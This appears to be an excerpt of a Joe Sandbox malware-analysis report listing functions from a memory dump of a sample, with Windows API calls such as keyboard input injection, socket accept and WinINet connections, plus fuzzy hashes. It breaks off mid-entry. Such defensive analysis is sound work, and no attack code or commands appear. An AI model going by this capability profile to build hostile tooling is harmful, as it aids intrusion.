
Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 934aa27698ef48d970382917e8b58a7ee627e4cb4edad8cff0b7d7c88a6a567c
Instruction ID: c79ff1113f7ae4f9ad287fbcb93f21f62367e63a3ae4e90bb674666e079a08ae
Opcode Fuzzy Hash: 934aa27698ef48d970382917e8b58a7ee627e4cb4edad8cff0b7d7c88a6a567c
Instruction Fuzzy Hash: FBA18C752047019FEB50EF54C481B5AB7E6BF88310F14854DFA9A9B3A2CB70ED41CB9A

Function 006691CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006691DD
SysAllocString.OLEAUT32(?), ref: 00669286
VariantCopy.OLEAUT32 ref: 006692B5
VariantClear.OLEAUT32(?), ref: 006692DC

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: dd3eaeddf46f84bdd95dc4a8656e5197a43cb7f43591863980c0bec8118a32e0
Instruction ID: 6d99b938930b1c7af458c88e8233129f0db0c8bf138e957937d45f537c6c5302
Opcode Fuzzy Hash: dd3eaeddf46f84bdd95dc4a8656e5197a43cb7f43591863980c0bec8118a32e0
Instruction Fuzzy Hash: 8251A330600306DBDB64AF65D891A6EB3EFEF45314F20981FE946EB3D1DB7098818729

Function 0065365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006536B7
_memcpy_s.LIBCMT ref: 00653729
__filbuf.LIBCMT ref: 006537AA
_memset.LIBCMT ref: 006537EE

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 6bc333eca420ab11db0f63219bf5266eeac88b5c0e8562be694fa3981aa9e6d6
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: F451EAB1E00315ABDB248F69C88459E77A3AF44BA2F24872DFC25863D0D770DF599B44

Function 0069C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(012D58C0,?), ref: 0069C544
ScreenToClient.USER32(?,00000002), ref: 0069C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0069C5DA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 772341cbc42914d9465a3df1fd213a6c00ae651ce6b48087219fd0d4bab4564d
Instruction ID: 82513aa18f81ff86a5db1494ef7c721e7bf4bef029783a6a69acd8b01c6adc4e
Opcode Fuzzy Hash: 772341cbc42914d9465a3df1fd213a6c00ae651ce6b48087219fd0d4bab4564d
Instruction Fuzzy Hash: B6512C75A00205EFCF10DF68C880AAE7BBBEB55360F108659F955DB691D730ED91CB90

Function 0066C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0066C462
__itow.LIBCMT ref: 0066C49C

Part of subcall function 0066C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0066C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0066C505
__itow.LIBCMT ref: 0066C55A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 13a379abeb5e8cb1ce72e09e61a1fc9c991118ab00f1b3a462d333940b91cd33
Instruction ID: 102f215f7548bb28d538cc8133db6a4504498239cbc1ea8e22b700a216d09ecc
Opcode Fuzzy Hash: 13a379abeb5e8cb1ce72e09e61a1fc9c991118ab00f1b3a462d333940b91cd33
Instruction Fuzzy Hash: 6841B671A00608AFDF11EF58CC51BFE7BBBAF49710F00002DF946A7291DB709A558BA5

Function 0067390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00673966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00673982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006739EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00673A4D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 10e9f9e08e72d043b5846a998974dd5cf76f3c0815bbc0aa0d98eba127c5cc0f
Instruction ID: 8c628528479c447d575967813161a8b1985c99bb12348f265bb2c0cae9f5059e
Opcode Fuzzy Hash: 10e9f9e08e72d043b5846a998974dd5cf76f3c0815bbc0aa0d98eba127c5cc0f
Instruction Fuzzy Hash: 0C412A70E44228AEEF308B64C806BFDBBB7AB55310F04811AF5C9563C1E7B58E85E765

Function 0067E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0067E742
GetLastError.KERNEL32(?,00000000), ref: 0067E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0067E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0067E7B9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: a5762365802119b5a77cf7002781430b7c5eca2bcef9e95a6b2acce0e072a7b5
Instruction ID: 1c974ac94993426830d8d1969a15eda2d08ac49f017a987cac7a80bff91f055f
Opcode Fuzzy Hash: a5762365802119b5a77cf7002781430b7c5eca2bcef9e95a6b2acce0e072a7b5
Instruction Fuzzy Hash: 13413579600610DFCB15EF14C485A4DBBE6BF99710F19C498E90AAB3A2CB70FD40CB95

Function 0069B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0069B5D1

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 49770a628981c3ea735cbe9de81debda44194ad4b7dcbdbcfd0f84d1694e4baa
Instruction ID: 37c48344f565664f95f313fe2502a8cb11cddbaf27faf00236630e3da195d744
Opcode Fuzzy Hash: 49770a628981c3ea735cbe9de81debda44194ad4b7dcbdbcfd0f84d1694e4baa
Instruction Fuzzy Hash: E431FE74600208FBEF208F18EE89FE8776FAB06350F546116FA11DAAE1D770B940DB55

Function 0069D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0069D807
GetWindowRect.USER32(?,?), ref: 0069D87D
PtInRect.USER32(?,?,0069ED5A), ref: 0069D88D
MessageBeep.USER32(00000000), ref: 0069D8FE

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 4518a509083b090cbd3a8a1365c545d91c2298205041e782aa1a7cedfbf5188a
Instruction ID: 9fabab0efa9f6fc1585423895608e26652f6c1da59d6a756c1b9e2cc76f97cf5
Opcode Fuzzy Hash: 4518a509083b090cbd3a8a1365c545d91c2298205041e782aa1a7cedfbf5188a
Instruction Fuzzy Hash: 7C415974A00219DFCF11DF59D984AA9BBFABF4A350F1882B9E814DF662D730E945CB40

Function 00673A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00673AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00673AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00673B34
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00673B92

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 49943acf93b87d171d784c14ad4e5f0076ee56928da0f8886f09d78b4d7929a8
Instruction ID: 8f0d735aad1577e7ab76d05d08c4bb6f123098cdccf4350eb03fea0601d380a9
Opcode Fuzzy Hash: 49943acf93b87d171d784c14ad4e5f0076ee56928da0f8886f09d78b4d7929a8
Instruction Fuzzy Hash: D8314670A00268AEEF308B74C819BFE7BA79B65710F04821AE4C9973D1C7748F85E765

Function 00664004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00664038
__isleadbyte_l.LIBCMT ref: 00664066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00664094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006640CA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: bba4f16b558e8eb745a2c051dc229023d67635c1c9fc1ca4e39124864e00d3b5
Instruction ID: 37b4966f572b25a7f9d63371c65e22bfbe34ee179b3fbb9c95d0b9a3e0e6dd52
Opcode Fuzzy Hash: bba4f16b558e8eb745a2c051dc229023d67635c1c9fc1ca4e39124864e00d3b5
Instruction Fuzzy Hash: 9F31CF31600266EFDB219F74C845BBB7BA7FF41310F158528EA658B2A1EB31D891DB90

Function 00697CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00697CB9

Part of subcall function 00675F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00675F6F
Part of subcall function 00675F55: GetCurrentThreadId.KERNEL32 ref: 00675F76
Part of subcall function 00675F55: AttachThreadInput.USER32(00000000,?,0067781F), ref: 00675F7D

GetCaretPos.USER32(?), ref: 00697CCA
ClientToScreen.USER32(00000000,?), ref: 00697D03
GetForegroundWindow.USER32 ref: 00697D09

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 2663391aa8a76e2f0702b831cd4584117bae28981fe1373adc8151f9dd8c8a8d
Instruction ID: 4a324b7d3f421034d48d926bcaa9419895c0cd7dee1a133ef828c30634000ad7
Opcode Fuzzy Hash: 2663391aa8a76e2f0702b831cd4584117bae28981fe1373adc8151f9dd8c8a8d
Instruction Fuzzy Hash: 49314FB1D00108AFCB40EFA5D8859EFBBFEEF58310B10906AF815E7211DA319E458FA4

Function 0069F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

GetCursorPos.USER32(?), ref: 0069F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006AE4C0,?,?,?,?,?), ref: 0069F226
GetCursorPos.USER32(?), ref: 0069F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006AE4C0,?,?,?), ref: 0069F2A6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 469fa7f5c95abf751785767d709b9e203e95e21dfba0f4316a08067a8756aa90
Instruction ID: c76a709b3ce756857a81bdc948bd6eccf346414c53349652488ac1bf29a164fe
Opcode Fuzzy Hash: 469fa7f5c95abf751785767d709b9e203e95e21dfba0f4316a08067a8756aa90
Instruction Fuzzy Hash: 41218039500018EFCF298F95C858EFE7BBBEF0A750F054169F9058B6A1D7319A91DB60

Function 0068431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00684358

Part of subcall function 006843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00684401
Part of subcall function 006843E2: InternetCloseHandle.WININET(00000000), ref: 0068449E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: b6027888af738fb759cbbd9e1fe3375ae8077b324fb0248ae518a25c05c83a60
Instruction ID: 819d303c58dd0759c951a4c800f124fea4b6ac20fc7e0504c358e414b606f7be
Opcode Fuzzy Hash: b6027888af738fb759cbbd9e1fe3375ae8077b324fb0248ae518a25c05c83a60
Instruction Fuzzy Hash: 7621A175200706BBEB15AF619C00FBBB7ABFF44710F10422EBA1596650DF7198619790

Function 00688A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00688AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00688AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00688AFF
WSAGetLastError.WSOCK32(00000000), ref: 00688B16

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 22c0b56aebf2e5f3973290b7d26aae51aae8b0a74ba865ab2f6c05f97c5d41e6
Instruction ID: f4261b77daf846a2ae4129a0f6757ab6e0c2b58e08d28dc242382c57a3d593d2
Opcode Fuzzy Hash: 22c0b56aebf2e5f3973290b7d26aae51aae8b0a74ba865ab2f6c05f97c5d41e6
Instruction Fuzzy Hash: 632196B1A001249FC7519F68C895ADEBBEDEF49310F104269F849D7290DB749A818F90

Function 00698A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00698AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00698AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00698ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00698ADC

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: f4c74b625ac90ccb3a8de58555c17ec3744415e96969aa79d2f482bf015ff78d
Instruction ID: ecb2d93caa230b999c54daaa96d73447753fb59f4e4935052c7712e12d08d8a6
Opcode Fuzzy Hash: f4c74b625ac90ccb3a8de58555c17ec3744415e96969aa79d2f482bf015ff78d
Instruction Fuzzy Hash: 0B11D031205111AFDB44AB18CC15FBA779EAF86320F144219F91ACB2E2DB74AD418B94

Function 00670AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00671E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00670ABB,?,?,?,0067187A,00000000,000000EF,00000119,?,?), ref: 00671E77
Part of subcall function 00671E68: lstrcpyW.KERNEL32(00000000,?,?,00670ABB,?,?,?,0067187A,00000000,000000EF,00000119,?,?,00000000), ref: 00671E9D
Part of subcall function 00671E68: lstrcmpiW.KERNEL32(00000000,?,00670ABB,?,?,?,0067187A,00000000,000000EF,00000119,?,?), ref: 00671ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0067187A,00000000,000000EF,00000119,?,?,00000000), ref: 00670AD4
lstrcpyW.KERNEL32(00000000,?,?,0067187A,00000000,000000EF,00000119,?,?,00000000), ref: 00670AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0067187A,00000000,000000EF,00000119,?,?,00000000), ref: 00670B2E

Strings

cdecl, xrefs: 00670B25

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 67f955f5cc5c75e20447ae093e333f4934446ca58cc932a79323af549b3acf2c
Instruction ID: 3bb9cad2060b9a0d96d32df9f993f698f1f22bebed3e989dbea811dae0285182
Opcode Fuzzy Hash: 67f955f5cc5c75e20447ae093e333f4934446ca58cc932a79323af549b3acf2c
Instruction Fuzzy Hash: 9011D63A100305EFDB259F34DC05D7A77AAFF45714B80812AE809CB250FB719940C7A0

Function 00662F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00662FB5

Part of subcall function 0065395C: __FF_MSGBANNER.LIBCMT ref: 00653973
Part of subcall function 0065395C: __NMSG_WRITE.LIBCMT ref: 0065397A
Part of subcall function 0065395C: RtlAllocateHeap.NTDLL(012B0000,00000000,00000001,00000001,00000000,?,?,0064F507,?,0000000E), ref: 0065399F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AllocateHeap_free
